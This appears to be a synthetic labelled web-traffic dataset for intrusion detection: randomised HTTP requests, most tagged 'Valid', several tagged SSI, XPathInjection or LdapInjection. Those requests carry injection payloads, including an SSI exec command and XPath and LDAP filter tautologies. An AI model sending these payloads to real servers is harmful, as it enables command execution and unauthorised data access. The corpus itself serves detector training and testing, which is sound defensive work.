If-Unmodified-Since: Fri, 17 Jun 05 13:37:38 UTC
If-Match: *
If-None-Match: *
If-Range: "aT4S.VYPW5CWTGxMTYo"
Max-Forwards: 7330
MIME-Version: 7.7
Pragma: le=ocrui2e7
Proxy-Authorization: Basic ZTMzdDp0b3FldHllbQ==
Authorization: Basic bjJ5ZWFmbTpoTHVl
Range: -293,9-
Referer: http://www.2gebhTei.cz/ch5sau3/yDeEl/ntSsaBb/aumemuo/yspt.php3
TE: gzip;q=0.8,chunked;q=0.0
Trailer: Warning
User-Agent: neIqotJ http://www.eocaua.cz
UA-CPU: Sparc
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: FTP/4.9 www.u8nba.gif
Transfer-Encoding: nydfd
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 3675108004232803
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24112
Start - Id: 9935
class: Valid
GET /e-Df5Ugm/nwil0sAeokimEs4sa/bfswhavn21wrl/hqtat/o2vWmL/ciDS4kJnq/si8xksw/a0u.aspx?ueluke1t=8&tcmRhqdlilreaa=lsra%5Coam&efhrciR4=dlimydneet%28w5adminm&ttEOtnttowtpU=oez0pael&Geezaf1aEtsngae=o&waEohegRtatzoy=hOnIPC3A&obhham=sodahaco&odvu3attl=301&xuEhvtmd=f+sistyleo+evaTm&75ieddcssSi=ftpih HTTP/1.1
Host: www.olX2k.gov
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-tw, iso-8859-8-i, windows-1253;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: oo0Ohod-aI3fi;q=0.4, aehJn-i51a;q=0.4
Cache-Control: max-stale=12175
Client-ip: 105.44.31.85
Cookie: IlssosEvs=dcoet]res;5eooaA=4407811;reac=3;hoa7gSXiix=ufsswah;7e='ds]es3sl7taos |;diskH=r-;n>
Cookie2: $Version="052"
Date: Thu, 20 Dec 07 09:08:46 GMT
ETag: W/"uhU3MkLbqMsAWA6eq"
Expect: 100-continue
From: hoyaen@w8anmIEhtt.org
If-Modified-Since: Thu, 30 Sep 04 22:10:57 CET
If-Unmodified-Since: Tue, 27 Mar 07 04:48:10 UTC
If-Match: "Q@Oej8dLxcCw3OIRAQaR"
If-None-Match: *
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 98
MIME-Version: 6.9
Pragma: akom5tet='ysot'
Proxy-Authorization: Digest username="eooxstrd"
Authorization: Basic VHFsUmNiOm9haHJ1ZQ==
Range: -911
Referer: /0goq/gtYir7.txt
TE: trailers,chunked;q=0.5,deflate
Trailer: Range
User-Agent: ewCs6Uhq/5.4.5.2
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9878x2759
Via: iwenro/0.4 41.78.30.23, HTTP/0.6 www.fh7eHtey.css, 0.6 29.113.213.139:4
Transfer-Encoding: compress
Upgrade: auldc/3.6, reoo/4.9
Warning: 097 www.eslmAdc.js "1aItavs" 
X-Forwarded-For: 133.212.108.145
X-Serial-Number: 443764018144231043
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9935
Start - Id: 21368
class: Valid
GET /oonaryhmn.html?SzqURpsbm=ahD69lBqSQI5&aE8ltegdi=Irb&tleWhA5fao6eie=ehsashrl%3Ci0%40in&BR2d=Mntuy&N8optRMjBDavH.=uh9dhwa%26&emz5eShEGh=699&oe=r1V&thc=+h&LmxQaF03NS=96248&ZQD7IjV-3dU=vi+%3Cn&gl=73796&hu5leiuoyaoa=ehsofu&eireodpo=sdw5EL&8untsoitr7Ct=06566832&iv_input8f--Q=6 HTTP/1.0
Host: 30.249.45.123
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=93136
Client-ip: 83.209.43.203
Cookie: 8VWwf90tA=941488619
Cookie2: $Version="4"
Date: Tue, 21 Oct 08 19:38:58 UTC
ETag: "NH-4d06ZBYMuVX6"
Expect: nnts9sl=eerczEea
From: erbhednr@ieSiief.com
If-Modified-Since: Tue, 16 Nov 04 11:21:42 CET
If-Unmodified-Since: Sat, 06 Jan 07 03:30:37 UTC
If-Match: *
If-None-Match: "4EUPpaG-khB_53Fp8JN"
If-Range: Sun, 24 Jun 07 18:04:42 UTC
Max-Forwards: 55
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: 7thhs liLSg=Ghuqmjra
Authorization: NTLM Qzd2ZWphZDNwaHB0ZGV6N2N5eXRodG5oaW95bWUwY2h5aXJhZ3NvVHlkdXJs
Range: -510,-15,91865-958
Referer: /seorthsi/liuObb/ehir/t5rE.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (Windows; U; WinNT 0.4; hl-of; rv:9.4.1) Gecko/56175420
UA-CPU: x86
UA-Disp: 3983,8389,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 945x442
Via: FTP/6.7 www.blieaid.tiff
Transfer-Encoding: gzip
Upgrade: ehr5t1/8.1, ans/4.0, Pae/6.5
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21368
Start - Id: 3303
class: Valid
GET /agn/sHUtaseflted6l.swf? HTTP/1.0
Host: 59.246.217.219
Connection: rlscSb
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: if2e-oyk1re;q=0.9, dul5u-Io;q=0.2, r8rcsawi-sftqn;q=0.1
Cache-Control: max-stale=2515
Client-ip: 134.201.181.61
Cookie: c0ittsRtia=136381;taIwtfesaeoaah= r;ajenShtrlrev=992534642;riheeirAo1lnte='e7ro;lumt=288913
Cookie2: $Version="250"
Date: Tue, 26 Aug 08 12:38:09 GMT
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: obew1
From: gooi@er7rmrhs.st
If-Modified-Since: Sun, 31 Oct 04 13:37:11 UTC
If-Unmodified-Since: Sat, 09 Oct 04 23:51:19 CET
If-Match: "BdFMO597hpFUiopd"
If-None-Match: *
If-Range: Wed, 09 Mar 05 01:22:23 CET
Max-Forwards: 933
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: NTLM Y2d0cmh2bHRTdGVrbjdqZTduaG1ERGltYW1xY2l3dXdob2l0Y2lwZW1h
Range: 715429-,64862-,731-870612
Referer: http://EsrsnAsN.com/kmwjba/attfwtoc/1heIos.htm
TE: trailers,gzip;q=0.8,trailers
Trailer: Upgrade
User-Agent: adosrzl (eYPoxf8VhV; o413nP)
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 179x3842
Via: FTP/4.3 www.8ec7b.css, 6.3 www.eifke.js
Transfer-Encoding: aerle; ocCaaezG=0enis
Upgrade: hsoEu/9.9
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3303
Start - Id: 26523
class: Valid
GET /ivUa1shg9oX/0L0UB%u3GQ./teqmqetejd/sh0/tCtna/i4GbM4Vq0ljavxMTS/eauni4yEsw/RaOEk/Xd3rxmlDR2Zw/hgCde8nraeudStcp/vuNQO3V2ZgqPVkkavcHy/connectrwUQQI.asp?uat0ONahoru=8&sg=4815080182&xstdinRmU6_Q%u1C=1&uhrf=A4reovbscriptb%27eri&fix=5030621&q7ijeg7ethmtih5=oENh&eny=7qK&yosgahsfecaS=09262&dwF=eounA%290ebtyd HTTP/1.1
Host: 175.109.89.112:2795
Connection: 4RikUoe
Accept: */*;q=0.4
Accept-Charset: utf-8;q=0.9, x-mac-chinesesimp;q=0.8, x-mac-arabic;q=0.4, iso-8859-1, cp-936;q=0.8
Accept-Encoding: 
Accept-Language: nsehibh-outoethp, sasnei-aiuyh;q=0.3
Cache-Control: no-cache
Client-ip: 218.160.252.253
Cookie: teaor=ienlttoxce;eoe63dlTe=o2ylowtBvhNx;5noret2me=Es;elyin0bseik=shutdownki;puosair=9779479;hie=ed7hiwskj2hz
Cookie2: $Version="222"
Date: Thu, 20 Sep 07 16:21:40 UTC
ETag: W/"TDjd9j93BlwuvXd"
Expect: 100-continue
From: 7vteaPad@uansAaaste.de
If-Modified-Since: Mon, 06 Nov 06 17:20:25 UTC
If-Unmodified-Since: Sat, 31 Oct 09 20:25:00 CET
If-Match: "1IAcsr97OijRQqQ."
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:04:41 CET
Max-Forwards: 1804
MIME-Version: 2.6
Pragma: pbh='zpun'
Proxy-Authorization: Basic dTVvbjpoYW10N2lU
Authorization: toaFcd egxso=enxiwlt
Range: -51243,13953-
Referer: /ceaa/lhsnLAg/ncscMee/opRg3tu.jsp
TE: trailers,chunked,gzip;q=0.7
Trailer: TE
User-Agent: uoeare (lum4bd22zz; rAb@frv8; nM16CXHvD; yMvVE2R)
UA-CPU: MIPS
UA-Disp: 196,1836,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: 4.0 175.9.56.237, A1boso/5.4 80.217.179.56, 7.2 41.78.55.192:7
Transfer-Encoding: gzip
Upgrade: ant/0.2, ebe/2.0
Warning: 503 www.rEangso.jpeg "tesd4si" "Wed, 14 May 08 12:40:15 GMT"
X-Forwarded-For: 36.115.237.41
X-Serial-Number: 693373977262
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26523
Start - Id: 40288
class: SSI
GET /yrhj@WlSni/pE2oQMDurI6MoCY8oImL/gBo-Vw4ZMBC5Es3nhSw.tiff?oore=rpraNshqcryipsraof&wintarAawsse=34722749&ornmsnireah=l&I1formjOS7processing-instructionfromN7H=0dbdahccag&ii7Rjyrul=ew&leea2im2hnnfa=%3C%21--++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CpaakztfCO%5Ctci3ie%5CExn.exe+d%3A%5Cuathj%5Cwww.esisinar.org%5CtleA%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E&wMadminDSsC7Kr=3551433684&QHjrntmpQ=1900&h@Ru=sb4ftrO7&Ehnyzylub=+u&akdl=79790&ryEi9=ieec HTTP/1.1
Host: www.n2e8d.st
Connection: muahEsW
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: 8tae-8lvds;q=0.4, rt-ooAlw7j4;q=0.3, s-ni, ntpool-Rheahpl, si-te
Cache-Control: no-store
Client-ip: 233.182.232.153
Cookie: sv=35947383;zeisensisir=yuace7mfhuct4dbst1;hgaisieEcqsl=1755;dtgtWCmt=jNdmgEvp;1er9=senaiacrr6tf;tfnrttthinrt=hsamenwfromaTbetweenOepyon 
Cookie2: $Version="08"
Date: Mon, 13 Jul 09 24:28:12 UTC
ETag: W/"ADBuQO9tIlPS2mf"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Tue, 28 Dec 04 19:03:02 UTC
If-Match: *
If-None-Match: "nN_LBTPbDG5@xIE"
If-Range: *
Max-Forwards: 50
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bzZlZ3Bvbm0xdHRoaWZHYWFjaWVtYTZsb2VxYm13d0R0OWVwb2ZpT2Ju
Authorization: Basic aElPcm5rbzpmZjVraA==
Range: 37574-,839789-
Referer: /wwfotra/mm5VhMn.swf
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 4.5; gd-ro; rv:4.4.3) Gecko/72709156
UA-CPU: MIPS
UA-Disp: 182,511,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: 9bitgr; atus=xavAdux
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40288
Start - Id: 18885
class: Valid
GET /h5sM-l5TMLl/XQZEvAhttpmB.htm? HTTP/1.1
Host: www.rb6r8ekr3.ch
Connection: keep-alive
Accept: text/xml, audio/*
Accept-Charset: gb2312;q=0.7, x-mac-turkish;q=0.1, ks_c_5601-1987, x-mac-arabic;q=0.6, windows-1252
Accept-Encoding: compress;q=0.4
Accept-Language: dfqut-esk;q=0.5, ln-orpwssix, s1ttpf-hLRtaae;q=0.1, olte2sr8-5;q=0.5
Cache-Control: only-if-cached
Client-ip: 235.92.37.140
Cookie: Otzlyrnc2S=same;Sv5Suapa=ikhP4;cUtsZhJahS=spaydio(cn
Cookie2: $Version="73"
Date: Wed, 17 Nov 04 06:04:46 GMT
ETag: "d0gxc9lfL-sJkju"
Expect: 100-continue
From: HiPzZ@7ede4.st
If-Modified-Since: Thu, 05 Jun 08 10:22:15 UTC
If-Unmodified-Since: Sat, 05 Apr 08 07:45:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5700
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: tmhl Keug=ghrSoes
Range: -47,36391-88404,16-
Referer: http://www.g3onna.gov/hnet.cgi
TE: gzip
Trailer: Cache-Control
User-Agent: lCDZDE http://www.1tipsqe.org
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 592x5506
Via: 9.2 www.adyeOnS.gif, FTP/8.7 10.218.222.45, 4.4 158.59.58.70
Transfer-Encoding: identity
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 515 www.thiaMal.shtml "s50npgca2ainent" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 47230032
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18885
Start - Id: 1029
class: Valid
GET /oNodEhr6zolnSoePd/gPmnNtSsm9aceEie9/7l.bV9c2pIU18c/tu/i2ANBPvU./itranalp59/azDmajAdpSdo2/athJWrEsEW3MHnZ5O/tsVG8X35W0y7hVg/tSwD2GEoJjtVcgVMGQK/tprlN.-kYR-9VAyS8.jpeg?eH=+ktoetohr HTTP/1.0
Host: www.aeozl.biz
Connection: 8oiux
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: 0auvw6hu-celi;q=0.9
Cache-Control: max-stale=5858
Client-ip: 147.230.207.208
Cookie: zrekdIRQit=ahiaiwhos9hsT6;drtwezteohesi= n;heaE=bj)iIs8hIimuciancnuCa;replaceO7I1Zmail=52410225;miA3taes=srnmnci4ryeZy
Cookie2: $Version="9"
Date: Fri, 09 Feb 07 06:56:23 GMT
ETag: "guQP-vgLmi_nEuJ8"
Expect: rfgminow=esd5ti;hfoor=rhnhnie
From: uueOouyl@ioTwhu.it
If-Modified-Since: Mon, 19 Dec 05 14:45:36 CET
If-Unmodified-Since: Wed, 17 Feb 10 17:08:32 CET
If-Match: *
If-None-Match: *
If-Range: "qsGyYbjVRISMD2w"
Max-Forwards: 51
MIME-Version: 8.6
Pragma: ino=rdfy
Proxy-Authorization: NTLM ZXRkaFRwOGxkZWczaTdkODZsUzlzdGljamxhTmxhMTRyc2VvYXRjb2xuYWl3
Authorization: Basic Zm5tZGRod2k6czNwZQ==
Range: 339-65412,180-85,-47
Referer: /caenOe/ity6M/ouoe/ageh.jpg
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: o6Eua5uE7ehtolrio
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5033x777
Via: HTTP/3.6 www.ozc48rci.htm:4052, 9.2 244.70.59.206, sssnl/5.2 195.85.182.201
Transfer-Encoding: deflate
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 976 www.rhtLT.css "c1yti6plTceoEa5eim0a" "Sat, 16 Jul 05 16:22:57 CET"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 3135796940
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1029
Start - Id: 27944
class: Valid
GET /0mailxDr/avOk15/ofthastce5gmht/w3LIfG/tzuda/Reu5pesimm/is/a7iAfQ/ttlnjnGJrese0nrdese/ux_pCeBIT0Op/ai.jpeg? HTTP/1.1
Host: www.oRAtaNdmth.biz:1
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: a=nv
Client-ip: 115.171.171.121
Cookie: si3ludieegsq=6915179;een2yGr9L=tpWuca(oiidhn;ePeavjdds=00267;sn8=94943;avhHpzemO=7Ze;m3E=a5Ze-qK
Cookie2: $Version="5"
Date: Fri, 03 Feb 06 08:24:53 UTC
ETag: "ioGj.SWMOaK1l.Z4w"
Expect: dun4h
From: aclt@ntyaoohns.cz
If-Modified-Since: Mon, 02 Feb 09 24:35:45 UTC
If-Unmodified-Since: Mon, 22 Oct 07 14:01:25 UTC
If-Match: *
If-None-Match: "35ZI@IcnFyiBH4VbvQl"
If-Range: *
Max-Forwards: 0260
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: NTLM ck5lcWV1aWljbHJuaTR0bmNqOGh3bncwcHNncndoZmhyc2RtbWVlcG5hbGlp
Range: 70-8,-3
Referer: /nzmyehd/ew2aig.wmn
TE: trailers
Trailer: Trailer
User-Agent: 2syOtcleso
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0093x2454
Via: ton/9.7 www.enN9.jpeg:30, FTP/9.1 0.20.189.171
Transfer-Encoding: gzip
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 832 59.92.226.57 "4ttWsncayb0" "Thu, 06 Dec 07 08:46:18 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 0343313955919
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27944
Start - Id: 29133
class: Valid
GET /lr0c/8Z/o-ieLMWK/5Rd-82kp7kws9VlzxoOl.php4?alr=havingee%3Bsamf3nbdu%24tmpi&C2kd7Qwl=aunh%3BS3qe2n98i&fshhele5rl=odnechoc%7EaqpsSt6nEe&ruohbSo=57wiaod%7C&tn4t=1955&Ka-6FvperlI=10&LgTxK0dI2=ttbrs&ltaltmasr=ge&a8=1698 HTTP/1.0
Host: 81.243.24.24:81
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: oet-eT8;q=0.8, 7o-st;q=0.7
Cache-Control: max-age=2
Client-ip: 186.234.179.68
Cookie: 3zzeosIaihldmy=nyeh5risigt
Cookie2: $Version="0"
Date: Sun, 20 Dec 09 11:50:09 CET
ETag: W/"B1-Hq3-tdE.0yKIGBz"
Expect: 9wpt=Fls4a
From: 9tlsAera@gi2n.org
If-Modified-Since: Thu, 13 Apr 06 04:15:59 UTC
If-Unmodified-Since: Fri, 01 Jan 10 23:46:52 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Mar 09 16:00:28 GMT
Max-Forwards: 13
MIME-Version: 6.1
Pragma: De3mrh='enioessS'
Proxy-Authorization: Basic ZWVhaHJBZjc6b2Vzbw==
Authorization: Digest uri=http://www.dnkSuN.uk/nt58rt/xrnaaid.doc
Range: -6
Referer: /grawda/6eah.tar.gz
TE: deflate;q=0.1
Trailer: User-Agent
User-Agent: 6tyar3
UA-CPU: MIPS
UA-Disp: 2948,2319,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 466x304
Via: HTTP/2.8 167.173.188.174
Transfer-Encoding: crfari
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 29133
Start - Id: 15614
class: Valid
GET /1.lT5lT4Sxperl@aposition/OvbVpasswd-ohJ/w0DrXh8RI@/C4b.all/aH1PWj7jYdIk_b/ieuY9ngionw6rsamnr/6Kx.css?NmdoecneiuoHl=Qvoherrarmopwy&tl=87&nuwrexweaw=480591904&lno=eoudetountip&onatneuNa=ptlfw&xe=htdetaw9ieiots2&dnv7=tsek72a7g&p6doaJsy=tzEt5Oh5b HTTP/1.0
Host: 170.235.3.176:80
Connection: close
Accept: */*
Accept-Charset: windows-1254, iso-8859-6;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: oi-an15n, parefee-otmhyAa
Cache-Control: max-stale
Client-ip: 62.234.130.189
Cookie: tfh8tefieOqaus1=aepoiedu;gRNbpMt@vu=05208
Cookie2: $Version="81"
Date: Mon, 11 Oct 04 20:56:39 GMT
ETag: W/"12NQOr7jXUOXeYr"
Expect: rMtet3ay=trlvn
From: egyhr8@dp3Tsste.uk
If-Modified-Since: Tue, 04 Jan 05 20:48:59 CET
If-Unmodified-Since: Tue, 04 Jul 06 17:59:26 UTC
If-Match: *
If-None-Match: "vhmh6.I@2TZupjED"
If-Range: *
Max-Forwards: 18
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic bXR2Z24zOmx0NnI=
Authorization: Basic YU9hdWRpbDphRXdpY3R1dA==
Range: 265325-,886-,-1
Referer: /eahetbd/frihu/2hAeziri.exe
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.1 (compatible; MSIE 2.4; Win 9x; nxe0s; ndtHedOn9; a8a5velaT)
UA-CPU: x86
UA-Disp: 4613,6717,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3825x476
Via: HTTP/9.6 www.tu7e.htm
Transfer-Encoding: compress
Upgrade: wagrj/9.0, xsoib/3.9, oxc/5.1, eEt/3.6, EE0sh/2.7
Warning: 222 www.0iel.jpeg:95 "owrAeinasr5" 
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15614
Start - Id: 50013
class: XPathInjection
POST /iq8HPzZuHe5YYN1f@i9L/n-/azt01zuYmP4D3Qsj/ts3tfTjtde/prAN3lUwWL/rzF@8ncqa/Nvpassthrugadmins/tYnkAC8tGbwCqfSKBio.cfm? HTTP/1.0
Content-Length: 273
Content-Language: hssa,sj7noew,teis
Content-Encoding: gzip
Content-Location: /rous/nfzo/ssaesoo/dsPt/wqyggf9.gif
Content-MD5: dHRobGtuYWVpVmQyaW5vaw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Jul 09 20:22:30 GMT
Last-Modified: Wed, 27 Oct 04 15:32:41 UTC
Host: www.eeel7rl.gov
Connection: keep-alive
Accept: application/rtf;q=0.9, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: idszhhE'    or   ldra/ca/child::node()[processing-instruction()=77]   or    'Wheoeht'   =   '
Cache-Control: fh='se'
Client-ip: 119.180.39.9
Cookie: sle=746;etcljaanE9n=lgi4uppr3s
Cookie2: $Version="209"
Date: Tue, 10 Nov 09 19:34:29 UTC
ETag: "X5MZbOJm_td_EEp@O"
Expect: a0eysadl=eytmxc
From: Ecil@targ.fr
If-Modified-Since: Thu, 14 Dec 06 23:54:27 GMT
If-Unmodified-Since: Tue, 27 Jul 04 23:40:35 CET
If-Match: "uW8222sey.6p4zfA"
If-None-Match: "W-RnLGtBcBuIBu9zlv"
If-Range: Mon, 25 Sep 06 11:37:42 CET
Max-Forwards: 74
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bGZJdHM0c2dvbGVTZkFkd09yc2E1QmRlZGlyc3Rjb25pOWZnZXRzOUk=
Authorization: iDoh 8irmti=dpwnnlkS
Range: 1-0902
Referer: http://www.Mt7sSe5.com/TicierI/tdidrm7.mpg
TE: trailers,trailers
Trailer: Range
User-Agent: dbWW17 http://www.rasn.org
UA-CPU: Sparc
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9581x753
Via: 1.2 www.edxba.shtml:148, 4.8 www.iRteeb.htm, hts/7.0 172.214.184.157:938
Transfer-Encoding: s9ede; p6m4ebwt=nteoioe
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 440 www.Ioi6teer.jpeg "89mXlfyths3m" 
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

Otps8sWi4=5Hde&sE6Wd=tite&9lR@=p84DO7De&c6o=85&PHupdatenRAXnullSlocationR0=%npasswdoe&ecoset=btd :cAthosU &hews4=2075531&RB3MdDcKZH=3622379&vhhq8aenss=@dsth&gtc36crwHc=emnhlnseamnHrdtbQ&sFTPJ=i 9i&CmYcK=5&nl3booc8eaubdc=8nincludeqhbsrgtnlur&iRga8naehha=iedteendnhOReC

End - Id: 50013
Start - Id: 38192
class: LdapInjection
GET /ht/oehtme/jfzsrA/nph-6e/cSmDeD/khf.bin?7DEH=tadazit&WQX2tmpp1z=%29+++%28++++%7C%28displayName%3Dhad*%29++++%28name++%3D++had*+%29%28mail%3Dhad*+%29&iot=6737154&Vndetttojnl=mr3la&3aecetlboa0Etse=6 HTTP/1.1
Host: 28.176.106.162
Connection: cEdm
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 245.205.142.82
Cookie: kNprocessing-instructiontmpwtDbP=Ui n4
Cookie2: $Version="70"
Date: Thu, 15 Apr 10 16:26:35 GMT
ETag: W/"cvMbx4sfux4.USQJj"
Expect: anoae=Rywdsuv
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 25 Jan 05 14:43:53 CET
If-Unmodified-Since: Tue, 13 Apr 10 23:15:38 UTC
If-Match: *
If-None-Match: "1h39WETND68lAI6D"
If-Range: Mon, 15 Nov 04 24:15:44 UTC
Max-Forwards: 50
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: Basic SG51N2U6ZXNFbnJm
Range: -49,281-
Referer: /0ttx/n3psEc/siapkim/iea6/nectr.swf
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: clmrdoq (ocKa_Dd)
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5505x7135
Via: HTTP/0.9 115.157.193.152, 9.6 40.50.173.120
Transfer-Encoding: ndeA
Upgrade: ntixr/4.9, Tjoh/5.9, isI4/3.2, nts/4.6
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38192
Start - Id: 48826
class: XPathInjection
GET /pga/atoW.E2JLfDbR079Kh/ns1/RWAdropQ9mvot2Q2/osnhehpdam/slotsserebtssoaT/oa1yobshtuda9.css?eioc6de5jyzEehm=t4pLhB1qgP4m&padtar2txhajn=1209&cdpid=weoud%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27staE%27+++%3D++%27&aolorkohvyctwl=76 HTTP/1.0
Host: www.5rJmry.net:2084
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.8, iso-8859-8, windows-1258;q=0.1, utf-7;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: csyen-6, l0-trg
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: elzdbakei=096;YWlinkWuF8g.ws=dxtermvoasystemerTkea =o
Cookie2: $Version="352"
Date: Fri, 29 Oct 04 12:17:16 CET
ETag: W/"HxRplA_cWdZdDiPv"
Expect: dL1a
From: 18kll@eaes.it
If-Modified-Since: Wed, 23 Jun 04 15:46:13 CET
If-Unmodified-Since: Thu, 17 Aug 06 05:39:55 CET
If-Match: "W@NPrxNgBkspdMT"
If-None-Match: *
If-Range: *
Max-Forwards: 5242
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest qop=auth-int
Range: 5920-3
Referer: http://www.7i7sia.fr/itCsnloq.php4
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/8.2 (compatible; erhcuI; Open BSD i386; xtqs; ja2ei)
UA-CPU: StrongARM
UA-Disp: 8370,749,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 5.8 140.74.219.98, 4.6 www.tsniwcz.shtml
Transfer-Encoding: deflate
Upgrade: ej6ash/0.0, c8tth/2.4, aem/9.4, atomei/2.3, cwtgw/0.9
Warning: 888 57.174.35.186 "l3aT4eMc1oeMeeesb" 
